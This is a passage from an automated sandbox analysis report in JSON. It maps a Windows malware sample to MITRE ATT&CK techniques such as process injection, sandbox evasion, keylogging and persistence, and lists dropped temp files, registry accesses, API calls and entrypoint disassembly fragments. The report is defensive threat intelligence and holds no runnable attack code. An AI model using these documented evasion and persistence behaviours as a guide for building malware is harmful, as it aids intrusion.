"attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\meorm.exe\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\_vslite.bat\"\n \"meorm.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\lojebo.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"meorm.exe\" called \"CopyFileW\" to copy %TEMP%\\meorm.exe to new location %TEMP%\\lojebo.exe (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ywrej.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A48065.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814\" file has an entrypoint instructions - \"push\tedx,pushfd\t,mov\tedx, 0x4a670ec0,call\t0x924839,inc\teax,xor\tebx, eax,add\tesi, eax,jmp\t0xe620d1,add\tesi, 4,rcr\tah, cl,movzx\teax, byte ptr [edi],add\tedi, 1,cmc\t,cmp\tsp, dx,xor\tal, bl,jmp\t0x9eb1eb,add\tedi, eax,jmp\t0x904a18,ror\tecx, 1,cmp\tsp, dx,test\tbx, sp,neg\tecx,jmp\t0xe9b632,jmp\tebp,movzx\teax, byte ptr [esi],adc\tdx, si,sbb\tdx, si,shld\tdx, ax, 0x31,add\tesi, 1,bsf\tdx, si,rcr\tcl, cl,\"\n \"ywrej.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x526000,lea\tedi, [esi - 0x125000],mov\tdword ptr [edi + 0x14f9f4], 0x9bc47d1a,push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x5961b2,inc\tesi,inc\tesi,push\tebx,push\t0x1942c4,push\tedi,add\tebx, 4,push\tebx,push\t0x70180,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,\"\n \"DISMHOST.EXE.67A48065.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005832)\n 